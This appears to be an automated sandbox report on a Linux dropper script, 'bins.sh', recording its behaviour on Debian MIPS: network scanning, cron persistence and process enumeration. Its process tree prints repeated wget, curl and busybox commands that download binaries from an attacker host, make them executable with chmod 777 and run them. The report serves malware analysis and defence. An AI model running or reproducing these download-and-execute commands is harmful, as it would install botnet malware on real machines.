Analysis
-
max time kernel
148s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
05-11-2024 00:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
259c24781ea50ed07083d852383db860
-
SHA1
bab7105282bcc4a8c8c8ca56fa657b9223c86fab
-
SHA256
fd9a3d3764a43a1d0cc4af5401c6fb2a4a333c84e66a9323acbd9a5305e9e11c
-
SHA512
c01d8e62e96c399a6f09da0428927e99c7369da10f5f2f4d5f6893f76205e55302a95e5bcee1d83810485414d7326990c05cf37da31e50a8b531a4deb9862ab1
-
SSDEEP
192:iz/+WqahFEQu2kVZNy8Qz3nqahFEQEZNy8QzV1/W:iSWqanEQu2kP6qanEQWb
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1944) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 740 chmod 912 chmod 942 chmod 953 chmod 748 chmod 781 chmod 890 chmod 901 chmod 919 chmod 929 chmod -
Executes dropped EXE 5 IoCs
Processes:
sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7XdvXTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxBTGZVPthKPk2URap86KcG8IC5ua8ThuC3t0fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aLioc pid Process /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 741 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv 749 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB 783 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB /tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 902 TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 /tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL 943 fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL -
Renames itself 1 IoCs
Processes:
XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxBpid Process 784 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.YNfwEz crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxBdescription ioc Process File opened for reading /proc/1047/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1062/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/829/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/915/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/975/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1018/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1019/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/4/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/75/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/891/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/985/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1061/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1078/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/831/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/861/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/924/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/946/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/23/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/968/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1044/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1094/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/993/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/994/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1024/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1043/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/676/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/821/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/833/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/848/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1076/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1086/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/79/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1017/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1032/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/851/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/875/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/902/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/808/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/847/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/855/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1096/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/706/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/807/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/877/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1041/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/989/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1089/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1098/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/827/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/928/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/929/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/967/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/798/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/906/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/947/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/960/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/22/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/36/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/69/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/711/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/933/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/1034/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/6/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB File opened for reading /proc/21/cmdline XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB -
System Network Configuration Discovery 1 TTPs 28 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxwgetwgetbusyboxbusyboxwgetbusyboxwgetbusyboxcurlcurlbusyboxwgetwgetbusyboxwgetwgetcurlwgetbusyboxcurlcurlbusyboxcurlcurlwgetcurlcurlpid Process 911 busybox 935 wget 716 wget 739 busybox 819 busybox 905 wget 917 busybox 922 wget 941 busybox 947 curl 757 curl 777 busybox 799 wget 915 wget 948 busybox 946 wget 752 wget 916 curl 956 wget 928 busybox 936 curl 736 curl 747 busybox 802 curl 923 curl 744 wget 745 curl 906 curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlwgetcurlbusyboxbusyboxbusyboxwgetcurldescription ioc Process File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv curl File opened for modification /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB wget File opened for modification /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB curl File opened for modification /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB busybox File opened for modification /tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 busybox File opened for modification /tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL busybox File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 wget File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6./sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- System Network Configuration Discovery
PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv./zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/chmodchmod 777 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB./XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:783 -
/bin/shsh -c "crontab -l"3⤵PID:785
-
/usr/bin/crontabcrontab -l4⤵PID:786
-
-
-
/bin/shsh -c "crontab -"3⤵PID:789
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:790
-
-
-
-
/bin/rmrm XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵
- System Network Configuration Discovery
PID:799
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga./MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵PID:893
-
-
/bin/rmrm MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t02⤵PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t02⤵PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t02⤵
- Writes file to tmp directory
PID:900
-
-
/bin/chmodchmod 777 TGZVPthKPk2URap86KcG8IC5ua8ThuC3t02⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0./TGZVPthKPk2URap86KcG8IC5ua8ThuC3t02⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm TGZVPthKPk2URap86KcG8IC5ua8ThuC3t02⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf./jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf2⤵PID:913
-
-
/bin/rmrm jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz./PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz2⤵PID:920
-
-
/bin/rmrm PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW./yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW2⤵PID:933
-
-
/bin/rmrm yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/chmodchmod 777 fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL./fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby./Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby2⤵PID:954
-
-
/bin/rmrm Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cFeF0m7z1ABbUbeeI74twMqXEBb79dgbM2⤵
- System Network Configuration Discovery
PID:956
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471
-
Filesize
210B
MD54fa62c6bdf22036bd712f91f1f2c65e3
SHA1241ae40d9a93ed7f5f997d78ed2476ee7a2aa2e0
SHA256be72fe178b170b26bed393df6fea58d18a134466ead83ee379b8bae366818e97
SHA512a336432b22beb0c9627895acd0f62a24c5ec2718b00df7cac83fe2d6347faa8463df38a0edad1a06d63eaae9b2db1a855aeed6bfdda8a25aff3e78137a8418f1